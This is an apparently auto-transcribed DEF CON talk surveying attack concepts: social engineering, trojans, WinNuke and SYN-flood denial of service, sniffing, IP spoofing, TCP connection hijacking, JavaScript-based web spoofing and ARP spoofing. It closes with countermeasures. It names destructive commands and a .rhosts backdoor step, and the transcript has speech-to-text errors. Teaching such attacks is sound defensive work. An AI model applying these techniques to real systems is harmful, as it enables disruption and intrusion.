 Attacks and concepts and ideas based on how relevant I think they are in today's world. I've tried to pick up stuff that would be applicable to most companies, to most organizations, may affect the most people around here. So we can get started. Just to put things into context, I've traveled here all the way from India. It's been a long, sleepless, and tiring flight. Not to mention extremely expensive, but I think I'm going to have a good time here and I hope you enjoy this session as much as I do. Okay, now you've kind of lost me, I'll have to... Another thing to mention is just because I'm here from India, it doesn't mean that this session is going to cover stuff like how to protect yourself from a malicious snake-chama, or how not to get trampled on by an elephant when you get out of your car. That's the stuff I cover in the pre-free newbie session. With every passing day, this first slide keeps getting more redundant, but it serves as an excellent starting point, so why worry about security? I'm sorry if this thing is a little unclear, what this is meant to illustrate is when a cartoonist takes security seriously, then things are serious. The only problem in this particular thing, for those of you who can't read it, can you read it at the back there? No, okay. It really shows two guys sitting in front of a computer monitor, and the machine's connected to the internet, and the red bubble that's coming through is hackers, and one guy tells the other guy, listen, brace yourself, here comes another one, okay? The only thing wrong with this is the hackers are really the good guys. That bubble should have been crackers, but what the heck? I mean, a picture's worth a thousand words, and this was what I located on the net. Okay, if you really look at it, what are you trying to protect? Every time you get online, every time you get connected, what are the main issues that one has to keep in mind? Information privacy. You're here at DEF CON, and you send a mail back to your girlfriend saying that, listen, I'm enjoying myself, but I'm missing you hell of a lot. Now, you don't want people to read that mail. It could be something personal. It could be something to do with business. Information privacy is information privacy. Data integrity. You definitely don't want your mail to be modified while it's traveling to her. And resource availability. You suddenly realize, oops, it's her birthday tonight, and I've been to the DJ, get together, and it's five to 12 now. I need to get onto my email, web email, and shoot off a mail. And you try connecting. Let's assume the wireless network is working perfectly. You try connecting from here, and you find connecting to hotmail, connecting to hotmail. No connection. Why? Because hotmail is under a denial of service attack at that time. So resource availability. You just don't have it when you need it. Okay. How would you classify people who are out there, people and things that are out there who might try to make a life miserable? Broad categories would be, you know, the human being, the human aspect itself. And the second one would be the digital machine. Stuff that is programmed. Okay, let's look at human and social engineering. It seems very trivial to talk of such stuff at a technical conference like DEF CON. But my submission here is, if something works, then the simpler it is, the better it is. And this is stuff that really happens and really affects people. I don't know about life too much in the United States, but back there in India, the internet has penetrated... I mean, you have phenomenal software guys sitting in India, but if you look at the percentage population of people who actually are connected to the net compared to the population of the country, it's miniscule. Now, even the people who get on to the net know very little about really dangers that lurk online. What happens in a lot of cases is, for example, there are students who come to study here in the US to pursue studies, who come and work over here. The last thing they probably do before they leave home is to buy a computer for their parents, hook them up to the local ISP, show them how to get online, show them how to use email and chat Now, these people, their parents, I mean, people of a generation who've never used computers, okay, you've put them on and you've connected them to the big, bad world. Till about two years ago, getting an internet connection in India was expensive. I mean, 15,000 rupees is what it started with. If you translated, it would be about, what, $300 a month? $300 for 500 hours or some nonsense like that. So there was motivation for people to try and get passwords and use those as dial-up accounts. It's no longer the case now, but I'm saying the motivation existed. So you had cases like, for example, you got an email from the administrator which said, listen, you've not changed your password in so many days. We are going through security maintenance procedures here. Would you please reset your password to A, B, C, 1, 2, 3, 4? Okay, and you would have people who actually reset it. So it's almost like a brute force method. I transmit to a huge number of people on the server and then I simply either write a small script or I go ahead and try and log in manually and find out which accounts have now been compromised. Again, a picture will say it better than a lot of words. This is rather clear, right? I mean, it did really encapsulate what I just said. Okay, posing. You have a fairly large organization. You've got a building with multiple floors and they're all connected and you don't know everybody around there. And I come around saying, listen, I'm the network administrator. There seems to be something wrong with your machine. Sit down, play with the machine, have a floppy with me, install a back door or a trojan, go away. It could happen. It does happen. If you don't think posing is too technical, you could term it as human spoofing. Okay, I've walked in as someone else. Dumpster diving. Everybody's heard about it. Throw stuff away. The last point is really the most important. You have a disgruntled employee and you've got a bad enemy because the guy sitting inside of your organization, most people protect their organization with a fence outside an electronic or digital fence. What do you do inside? Very, very few people take enough security precautions within an organization and 65% of the attacks happened from inside was based on a study which happened maybe one and a half years ago. I actually think the number is probably higher. Maybe 75%, 80% of the attacks originate because of inside information. Okay, now to the slightly more interesting stuff. The programmable dangers today include this entire list that is out there starting from viruses and back doors and denial of service attacks and sniffing and spoofing. Viricinal worms. My opinion, this is the biggest threat and the worst pain in the butt for most corporations. Very simple. To use or... I mean, I don't need to get into your machine when you are online, try and get the root password and then do a rm-rf slash or del star dot star from slash. That's complex. What if I could simply send you an email which contained a piece of malicious code which did exactly that? Okay, the mail comes to you from someone you know. There's an attachment on it, you click it or there's a program which, you know, kind of is supposed to do something else, you click on it and it actually launches a piece of virus which goes and sits in your boot sector and toasts your hard disk. So, you have an organization now with, let's say, three, four hundred people and you know how the internet is, right? You kind of keep forwarding jokes and you forward pictures and you forward stuff to each other. So, something interesting comes into this organization and before you know it, everybody else has got it. Now, why is this so dangerous? Simply because port 25, your mail server port or the machine that's going to pick up mail from your pop account is really going to allow connections through 210 to 25. You download stuff off the web. Most firewalls would allow connections to port 80. So, it's really a very loose fence that lies over there and therein lies the danger. You know, people get stuffed down before you know it and it's so easy to write viruses these days. I mean, you've got do-it-yourself kits. You've got Microsoft. So, it's easy. Viruses is actually a super specialized shopping in itself. I don't know much about it. I'm not very interested in it. So, we'll go ahead to the next one. Excuse me. Okay, Trojans. Everybody heard of Trojans? Trojan house programs? Yes, no. Wonderful. Pretends to do something useful. And I mean, the slide is self-explanatory. I remember the first time I did this about 10 years ago during post-graduation of software technology, wrote a login emulator into the mainframe. And it was unbelievable the number of passwords one picked up. More importantly, all the guys, or let's say 80% of the guys, you'd know which women they were hot after, simply because that was the password they'd selected. So, the next time you go and login into your system and it comes back with login failure and the login prompt comes again, ask yourself, listen, was that something else? Or was that me making a typo? Okay. What is the denial of service attack? Anything that prevents the normal function of services, servers, networks, hosts, it cuts you away from resources, can be termed as a DOS. And DOS in principle is not really new. In the olden days where computing power was still looked up to, it was still precious, RAM and CPU was valuable, these things have existed since that time. So, for example, if I wrote a small script which kind of said, while true, make directory A, change directory into A, and repeat the loop. Okay, what would happen? It would recursively go all the way in. Okay, now let's say on a unique system, you're limited by the fact that you're a particular user of constraints on what you can use up. But let's say if it was run as root, or in the olden days where limits were not imposed so tightly, you would run out of inodes on the system. Okay, every available inode where you can hook on a directory or a file would be taken up. And in effect, you've done a DOS on the particular machine. The DOS that we are interested in today is a little more advanced. I'm interested in being able to sit here and launch something which kind of goes and does something on a server which is probably sitting in Iceland or Alaska or something, or maybe the other way around. Okay, now there are multiple ways in which you can execute denial of service attacks. One of them is called, let's call it magic packets. The principle here is to send a small, maybe even a single malformed packet to your target host. Now, the malformed packet is what causes the magic to happen, okay? This packet will really break accepted de facto network rules. So for example, the packet could be oversized. If the packet is a TCP packet, there are various control flags that a TCP packet has. You are normally, I mean, these control flags would signify what stage of the connection this entire connection is in itself. Am I making a connection? Am I transmitting? Am I acknowledging? Now, if I could set up flags which were not expected by the remote system, that could be a problem. Injecting out of sequence packets. Now, the reason why this particular attack would succeed is because the TCP IP stack on the target machine is not stable or robust enough to handle exceptional cases. Anybody heard of WinNuke? It's a very old thing. How many heard of WinNuke? Yeah, not too many, okay. When Windows 95 actually popped up, it was a nice, good, clean, graphical user interface. That's when this thing was formulated. The way this attack worked was it targeted the Windows machine on port 139, which was the net IO port. It sent the packet with the OOB, the out-of-band flag marked as on. The remote machine didn't know how to handle it because it was a thug, you know? So the story is like if you're an ISE and you're chatting with someone and you kind of get into an online virtual argument, and all of a sudden you see a screen go blue, the blue screen of death and your machines crash. It's probably or was probably a WinNuke packet which was generated. The reason the machine crashed, your Microsoft OS went down was anybody? Simple. Whenever a Microsoft program doesn't know what to do, it does what all good Microsoft programs do, but it crashes. And the story here is that the minute this thing happened, Microsoft was informed, they released a patch, and it is ridiculous as the story goes. The patch was like this. If I sent you a WinNuke packet, the payload of the packet contained a particular string. If I recall correctly, it was BEWM. So what Microsoft did in all its wisdom, it filtered anything that came to port 139, had the OOB flag on, and had a payload of BEWM. It silently ignored that. It was a matter of a few hours before WinNuke 2 happened, which completely randomized the payload, put in various other things, and then Microsoft was forced to actually release a real patch. But why WinNuke is so important is it became the first piece of software that used magic packets and was distributed widely over the world. I mean, you had variations where I could set up one piece of one attacker shooting to various machines and stuff like that. It was fairly crazy. Another style of DOS is a network saturation attack. As the name implies, you flood a network with so much traffic that machines and routers on that network simply can't handle it anymore. What happens is they go into high strain trying to route and process the packets as they're coming in. All these packets, because they're illegitimate, are actually taking away resources, bandwidth as well as CPU power. As a result, what happens? Real applications, like web and email and FTP and stuff like that, that legitimate users might want to use, also get affected. Network saturation attack actually affects a large number of people. I might be wanting to target that particular thing for one particular individual or organization, but anybody that's using that network is going to get affected. All networks which are en-route, the attacker and the victim, would also get affected because of huge amount of traffic. There are other ways in which you can do DOS. It's really dependent on your imagination and innovation and how much you know of the protocols. Everybody heard of ping? You ping a machine to see if it's alive or not? Now, what happens if I send out a ping packet as a broadcast ping to multiple machines on my subnet, for example? Each of these machines is going to get a ping packet and each of these machines is going to reply back to me. So instead of pinging one machine, I've pinged multiple and I've got multiple replies back. Okay, so where is the trick here? What I could do is, I don't like him. He's my whatever, neighbor and I know he sits here. I know his IP address. I spoof a ping to a huge network with his IP address. Okay, so what happens is all the machines that receive that ping request actually send a response back and this guy's machine is hit with that. Okay, so things like that. Similarly, sin flooding. You know, you set up so many connections to a machine that every machine's got a finite capacity for accepting connections. I mean, it's configured. Now, once you exceed that, any other connection that happens to come to the machine is going to get dropped. We'll be looking at sin flooding a little later. Similarly, connection killing and hijacking. You have a running connection between two machines. I can actually try and break it. We'll be looking at both of these. Okay, they say you can't get too much of a good thing. So when you're doing a DOS all by yourself, the next logical step is to have a distributed denial of service where the principle is simple. It says united, we deny. A plain DOS will have a single point of launch. Okay, so if it is identified that there is a DOS happening from this particular machine off this network, it's easy to filter out those packets. Authorities which actually handle the links and route can also start dropping those packets. But in a DOS, you have several launch points. So the typical accepted method is you compromise a huge number of machines based on bugs that may be there. On every compromised machine, you set up a DOS client. The DOS client is triggered eventually with a DOS server. So what happens is at one point in time, I use my DOS server to activate thousands of DOS clients, all of which can then target a particular network or a host or whatever it is that you need to do. Okay, the benefits with a question mark depends on which side of the fence you are sitting. Okay, if you're the guy who's doing the DOS, then these are benefits. You can now, I mean, disabling a few individual machines is not going to stop the attack. You can now target larger networks. About, I think three years ago, when Netscape Corporation was still up and alive and really big, I remember reading somewhere that the total bandwidth that went into the Netscape Corporation's office was greater than the entire international bandwidth that India had. Okay, so in case I needed to, I mean, I was a Microsoft fan and I wanted to knock off Netscape. There was no way I could do anything about it using a DOS. But a DDOS may have been successful. We have had incidents where Yahoo, eBay and stuff, big photos like that have been knocked off. Am I going too fast? Is the speed okay? Wonderful. The next thing we're looking at is sniffing. Most corporate networks, okay, are broadcast networks, which means when machines are talking to each other, there is a chance, I mean, everybody actually gets to see the broadcast. In the olden days where you had physical cables connecting and have hubs and switches, it was truly broadcast. I mean, I could see and hear everything that happened on that particular network. Today it's slightly different. Switches make it a little more difficult to sniff, but if they're non-configured, they can also be compromised and you can sniff on it. The way it works is you have a sniffer program which puts your network interface card into something known as promiscuous mode. Normally what happens is your machine is going to accept packets that are designed only for it. The minute it goes into promiscuous mode, it's going to accept any packet that travels past it, which is all the broadcast packets. The card will now accept the packet. It will push it up to the sniffer program and the sniffer program then decides and chooses packets that are of interest to it. What do you think we could use a sniffer for? Most obvious applications? Username and password? What else? Email traffic? What else? Credit card numbers? All of you guys are on this negative trip. How about analyzing network traffic? The good guys really call the sniffer a network analyzer. Characteristics are it's passive. You're just listening. It's not really intruding. So it's fairly difficult to detect it. These are the users we talked about. If I log every byte that travels on the wire where my machine is, in effect it's a remote key logger and the last two points, really, that's true. It helps to paint a very accurate picture of the network traffic. Often the only indications you'll have is when you see that hard disk light beaming and beeping frantically and the CPU load going fairly high because now this guy is accepting and processing all packets. So it has to write them somewhere if you're going to capture them. It has to process them so the CPU is very active. Somebody might say, listen, what if I run a PS? Can I get a process listing? Yes, you can. But if the system has been compromised, these programs would have been rogent and replaced. So you run a PSAX and you would actually see all the processes minus the sniffer. You run an IF config which actually checks the status of your network interface card and you would see that it is not in promiscuous mode, whereas it really is. Okay. The first one is something that we've already talked about in the first slide, human spoofing. But in reality, it applies into the digital world also. The minute you pretend to be someone else, you've gone into what is termed as a spoofing app. There are various types. IP, DNS, web, and... Okay. So what is IP spoofing, really? You forge the source IP of your first packet, of your connection packet, of the packet that's actually going to talk to people. With an IP address that is not yours and you've spoofed or you've pretended to be someone else, the typical method in which hacker or a cracker might use this is to use... They use a denial of service attack to knock a particular machine off the network if it's not already off. I mean, if there's a machine off and you know that this machine's not alive and it cannot respond to packets, then you don't have to use a DOS, but otherwise you use a DOS, knock a machine off. You masquerade as the machine, talk to the target host. Because you're masquerading as the machine, if there is a trust relationship between these two machines, between the target and the machine which is now knocked off, you can exploit that trust relationship. A lot of these concepts and ideas really work together in harmony to create a completely successful attack. So when we talk of IP spoofing, I can use IP spoofing for SIN flooding and use that as a denial of service attack. The idea is you have two machines, A and B. This thing is termed as non-blind simply because it happens to be on the subnet, so I can actually see packets traveling between the two. Let's assume I knock A off the network. A can no longer respond. I've used a DOS or the machine is off or NOS someone's not there. That machine is off. Now I want to target B. What I really do is I send it packets impersonating as machine A. Now really what's going to happen is every packet, every connection that is initiated is going to go with the SIN flag on. In my packet it says I want to... This is my initial packet. I want to synchronize the connection with you. B gets that connection. How many people have heard of the three-way handshake? TCP three-way handshake? Okay. So it's really exploiting the TCP three-way handshake. A packet supposed to have come from A, goes to B with a SIN flag on. B accepts the connection. It responds back with its own packet, saying that, okay, I'm also going to synchronize. This is my initial sequence number, switches on his SIN flag, and he acknowledges the first packet from A. Now in reality, A is not alive. Okay? So this packet has gone back to A. If A were alive, A would respond with its own acknowledgement. One, two, three. The three-way handshake would have taken place and that would be the start of the connection. Now since A is not on, B is going to go into a time-out stage. Now while B is waiting for an acknowledgement to come, he's actually got a data buffer in memory, which logs the state of all connections that are still pending, all connections that have not been picked up by the application. Now this queue, which we will call the backlog, is of finite size. If I can send enough SIN connections and fill up this queue, B is actually going to be waiting in that particular state and not accepting any more connections until all of them time-out. Now eventually they will time-out and we will start accepting connections, but it's trivial for me to keep initiating new connections every few seconds. Okay? So this is called a SIN flooding attack. B is completely knocked off. Okay, this is the problem. One sec. Okay. You can see that A has been knocked off. HostX impersonates A. It causes the backlog of B to be exceeded and B won't accept any more connections. So you've just done a DOS using SIN flooding and IP spoofing. Okay. Now you can use the same principle to actually kill an active connection between two machines. You know that TCP maintains its so-called reliability based on sequence numbers and acknowledgments between an active connection. The sequence numbers actually allow machines to put out-of-order information back into order to discard duplicates to make sure the connection is being established with a three-way handshake, breaking with a four-way exchange and so on and so forth. If I can now compute the sequence and acknowledgments of packets as they travel past my machine. So I sniff the packets. I compute the sequence numbers that are happening and let's say that I want to now terminate this connection. I can create a packet with the reset flag on, the RST flag. The RST flag when it is received only needs to have the correct sequence number. The machine that receives this flag for that machine it's a signal to tear down the connection immediately. So you have A and B running a connection which is live in real time. I'm sniffing the packets as they go through. I compute the sequence number. I create a fresh packet with the expected sequence number for let's say B. The reset flag to on and I inject it onto the network. Now if your computation is correct, if the timing is correct, if nothing really goes wrong, B is going to accept this. It's going to see the reset flag down. It's going to tear down the connection instantly. All of the packets that come from A into B are simply going to be discarded because they will be assumed as bogus. In fact, B might even send a reset back. So we will call this an evil reset flag. Now you could do the same thing using the fin flag when a machine legitimately wants to shut down a connection it actually switches the fin on sends the packet to the remote machine. The remote machine acknowledges it and when he is through with whatever he wants to do he sends his own fin back. So just the way a three-way handshake sets up a connection a four-way transaction breaks the connection. The beauty of using a fin instead of a reset is you will always get an acknowledgement back from the remote guy. So if I've injected a fin inside and for some reason I don't get an acknowledgement I don't sniff the acknowledgement from B I know something went wrong and I can attempt to do that again. The principle is same. Now you take this one step higher logically. If I can kill a connection why can't I hijack a connection? So let's assume you've telneted into a particular machine you're running a shell over there someone from A has telneted into B why can't I get in and actually take over the connection and pretend to be A? You can. The way to do it here is to compute the sequence number in... Yeah? So as a result what will happen is A will continue transmitting what it had to transmit but since B has updated his counter he's going to treat those packets as bogus packets which leaves A completely confused your packets are traveling to B your packets have got the correct sequence numbers TCP only cares about the sequence numbers that's how it's maintaining reliability and in effect you have actually taken over that connection so if this were a shell that we're running there you could simply install a backdoor program or if the R commands have been enabled you could set up a .ROS file with a plus plus inside it break the connection the guy who's sitting on A will probably think I mean if he's dialed in for example or it's a bad connection or the program's hung normally people kind of break it and just log in again so I mean real life breaks do happen just because the thing happens to break doesn't mean you've been hijacked but these are ways in which people could take over a running connection any particular question so far? does that mean everybody's understanding? it does that mean you're not understanding? I'm not going to ask that one okay this one is as you can see it's based on a technical report at Princeton University which happened in 1997 but I believe it is so applicable in real life the thoughts and the principles that this is something that I would be very happy to share with you the idea in web spoofing is that the attacker actually creates a shadow copy of the web okay and if you are a victim when you are surfing you actually believe you're surfing the real worldwide web whereas you're actually surfing the web that has been set up by the attacker okay I can almost say the first question somebody says hey you mean somebody's going to copy the entire worldwide web? no it's not like that we will look at what really happens here if you look at the point the second point you know it's applicable for all spoofing spoofing is like a con game you set up an environment which is convincing but simply because you're doing spoofing it's really a false environment and based on how well you've set up that environment you're going to affect the behavior of the victim completely based on contextual cues okay now if this is successful what does it do? what really happens? this will influence all security relevant decisions that the victim is going to make when I say security relevant what am I talking about I'm talking about names and passwords you might want to log into a service you might give credit card information you might accept documents and we've already seen the dangers of you know let's say viruses or malicious programs being embedded in documents you might accept the accuracy of information so if you're into trading and you actually are looking at a website which says the shares or the prices of you know whatever VA linux or Microsoft have gone up or down and you base decisions based on that these are all security relevant decisions and all of these will be affected in this kind of an attack so why does it work? okay this works because the attacker has very intelligently used context when you're surfing the web most experienced surfers behave like drivers okay so you're driving the road you're not really thinking I need to press the most of you guys drive automatic transmission so I don't need to press the clutch now or the brake now and stuff like that somebody runs across you jam it it's all automatic now exactly in the same fashion you go to a website or you see a logo that materializes in front of you and the mind has subconsciously accepted that you're connected to the server you want to connect okay so the appearance of the object the name of the object manual.doc is manual.doc the manual for the software that you have just downloaded or is it something else altogether for all you know it might be an executable finally the timing of events if I fed in www.mybank.com and I get a pop up which says name and password simply because of the timing of events I am going to enter the name and the password that is my login into this particular bank now if all of these happen these are the images that are alive surveillance obviously tampering the brand new Dell or whatever that you order if I could change the deliver address to mine the new paid for my machine and quantity numbers and product numbers and so on and so forth anything can take place now let's look at how it really works these are the principles on which this particular spoofing attack will work it's termed as a man in the middle attack I am not sexist I didn't coin this phrase it could be a woman in the middle attack but the idea is here is the victim here is the desired web URL and in the middle is the attacker so it's a man in the middle attack between a client server it works on URL rewriting so if you go to www.hotmail.com the page is fetched all the URLs on that page are rewritten to let's say www.attacker.org www.microsoft.com whatever else so every subsequent click on a link will actually go to the attacker's machine first from there it will go out to the real web and then information would come back to you after having been tampered now this would work completely with forms because forms are so closely integrated with the web protocols you might even see a secure connection indicate a light up let's say hotmail now gives you a secure connection into your email box sure you have a secure connection the only difference is your secure connection is between your machine and the attacker's machine it's between you and the attacker and you have the secure connection the lock going up so how would this attack actually start how would you begin it you would need to have a false link a false link on some web page you could transmit a false link using webmail where you've got html enabled or you could even have a poisoned search engine for example a search engine has actually indexed a page which seems to contain good information but really serves as a starting point for this kind of an attack okay okay let's assume the attack is on the way I've described it so far is fairly effective okay it would work it would be able to take your request it would be able to pull out your request from the web translate each of the urls and feed that back to you but the attack the way we've talked about is not perfect can anybody tell me what there are still contextual cues that will tell the victim he or she is being attacked things like sorry malformed url yes what else doesn't anybody surf so you guys are experienced surfers okay it's simple every time you move your cursor over a link when it turns into a hand you have the status line at the bottom that would reflect the link so you would actually see www.attacker.org slash the real server every time you click on a link for a brief instant as the browser makes a connection to the remote machine you will actually see connecting to attacker.org now these are things which the victim could see and realize something is going wrong so as an attacker what do you do you fall back on the premise that the major browser makers have made life comfortable for you they've let the browser be very customizable so you embed a piece of javascript into your page javascript is allowed to write to the status line okay so this piece of javascript is now going to get rid of both of these problems every time I hover my cursor over a link it's not going to show attacker.org slash whatever it's going to show me what I really expect to see every time I click the link although the browser is connecting to my machine to the attacker's machine it actually shows a connection to the target that you really want to reach so you've overcome obstacle number one any other things you can think of that might be a problem that might give the victim an indication of the attack in progress so it's good there's something even easier than that yeah I'm sorry I can't hear you right sure I'll come to SSL in a moment okay okay once you are connected to a particular site if you realize the top bar the location line actually shows the page that you are on the location line in this case even though the status line has not given me any clues will actually show me that I am at attacker.org slash whatever else once again javascript comes to the rescue you can actually replace the location line completely and the people who did this study in Princeton who did this report they actually made a working model of this thing so the location line also reflected the correct URL the next question most people ask is listen what happens if I go and feed an information into the location line again very valid the javascript will allow me to accept info so I say hotmail.com internally this guy will make a connection via attacker.org so you've suddenly eliminated all visual trace okay there is one more thing that you could do as the gentleman here mentioned what happens if I view the document source the document source is going to show me the presence of both of these pieces of javascript and immediately the attack is known my question is in real life how many of you view the document source every time you visit a website not too many let's assume for a moment that all of us got paranoid when we went away after this presentation and we started viewing the document source of every page we visited for the next three days for the moment hypothetically now it would be very clear that there is something going wrong here okay once again javascript is your friend what these guys did was they replaced the menu button on top the menu drop down which shows view document source and they embedded their own stuff so when you went and actually clicked on view document source this guy showed you the real page that had come from the web minus the attacker URL rewritten links and the illusion was complete okay there was no way to get out of it okay so this is completing the illusion this encapsulates the points you just spoke about the remedies that were suggested are things like disable javascript be very alert look at the URL lines look at the location lines the recommended software enhancement so when you're doing an SSL kind of connect instead of simply having an indicator which kind of you know you have a lock which is on how about if that guy actually said I am connected to Microsoft.com because your information exchange would have that kind of information I'm sure that's true I completely agree see it's a unfortunately there are these two things the good and the evil so you have a lot of good with javascript I understand that all I'm saying is that the same tool can be utilized for evil also so somewhere it's a fine line somewhere you kind of decide you know I mean if you know nobody's really going to target your grandmom and there's really nothing tougher there you keep it available yeah I'm not very sure java would be more difficult to do simply because of the sandbox rules for example on linux now conqueror lets you specify per site enabling of let's say I could enable javascript on a per site basis I could enable java on a per URL basis so if you know you are connecting to a trusted source you may choose to enable it over there but the recommendation would be by default disable and then enable only small okay what are normal regular counter measures most of these things that we spoke about actually arise out of ignorance pure and simple ignorance so user awareness is very critical in an organization you need to set up policies things you put down on paper would say I will let my employees serve only at this time I will let these sites be available I will allow email to happen or I won't allow email to happen put up things like password titaners so you won't kind of simply put in girlfriend names pet names and so on and so forth set up expiry dates completely avoid clear text programs if you're doing any kind of terminal work you're logging into systems who are we telling it okay use SSH bypass FTP okay now the next three or four slides really I'm not sure if we have time to get into because I've just been told I've got something like two and a half minutes left but my next four or five slides actually talked a little bit about firewalls what kind of things you can apply for those of you are interested if you send me an email I'll try and make sure the presentation is available online next two minutes should we just take up questions if any yes right when I was talking sniffing I actually meant being able to read the low level packet so it's not so much about spoofing using email on a switch network what would happen is the device the physical device is a little more intelligent so even if you've got 50 machines connected it would route information only between the two required machines right which is why it becomes difficult to sniff on a switch network but I believe you can do things like ARP spoofing so a level lower than than your IP level for example so every time a packet is sent out on the ethernet he needs to figure out the hardware address of the machine to write to now there are programs and there are ways I'm not really an expert that to that level but there are ways in which I can when an ARP request is sent out the response that comes back directs the packet to come to my machine now if I am smart what I will do is I will make sure my machine becomes a man in the middle kind of thing so I will relay stuff so for all practical purposes A is talking to B you are doing stuff but everything is going through my machine simply because I have been able to ARP spoof that particular connection anything else? yeah okay there are really again that's getting to be more and more difficult but there are many ways of doing it normally though it was well accepted that the stack when machines actually came up they kind of started with one right in the beginning and every second the counter got incremented by 128,000 for every connect you got an increment of 64,000 now really what happens is when you are trying to predict sequence numbers you would try and make legitimate connections to a machine multiple connections so you kind of compute three four things one is you get to see what the ISN is the initial sequence number you kind of log that when you find three or four connections you get to see how the increment is happening then you also figure out how much time it's taking your packet back the round trip time so you need to know roughly how much time it takes to reach there because with every packet reaching your counter is going up by 64k okay based on these kind of things you initiate a connection and hopefully someone else has not gotten before that where you can predict the sequence number okay these are getting more and more difficult because logically the next steps were to randomize the way sequence numbers were happening so if you run nmap for example which is a port scanner and OS detector on a lot of machines it comes back saying listen I've detected windows here and it's trivial your sequence number prediction is trivial or if it's linux it says bad stuff good luck to you friend you know things like that it's yeah I don't think so I don't think so I mean let's look at it if the packet never reaches you okay you don't know that you are being denied information or requests that are coming to you sure you might notice that my web traffic has gone down okay but there could be multiple reasons for that I mean for example if I did a denial of service attack against a particular site let's assume there's an ISP who's got lots of clients over there you're targeting one particular client simply because you are creating so much of network saturation and you're making life miserable for all his clients what will the ISP do he'll simply filter out any packet that's coming to the target site in effect what has he done he's helped the attacker I mean he's done what the attacker was trying to do much more effectively he just pulled the plug on that guy okay so it's yeah sorry yes please frankly I haven't used commercial firewalls most of my work is with packet filtering on linux so I really am not the right person to give you information on that sorry yeah sure it would I'm sure but it's like saying you're taking corrective action after the event has taken place after something's happened at that point of time the amount of loss that has taken place and the amount of negative that has happened is something which you probably can't reverse isn't it sure now we are getting into business policies again which would vary in different parts of the world all my my premise is I've gone and deleted all the information on your server doesn't help yeah I'll give you my last just in case anybody needs to write to me okay that's my email address in case somebody needs to write and ask I'd be happy to yeah sorry 1997 is when the report came out and they said at that point of time it affected both microsoft internet explorer as well as Netscape I'm not sure of current status the idea of sorry no they actually said we have a working model which we've demonstrated but we're not going to release it to the web but it was pure javascript they actually replaced the real menu with their own so when you clicked on it internally the intelligence was built into actually get the real page and show it to you yes yes yes yes okay thanks I'll stop here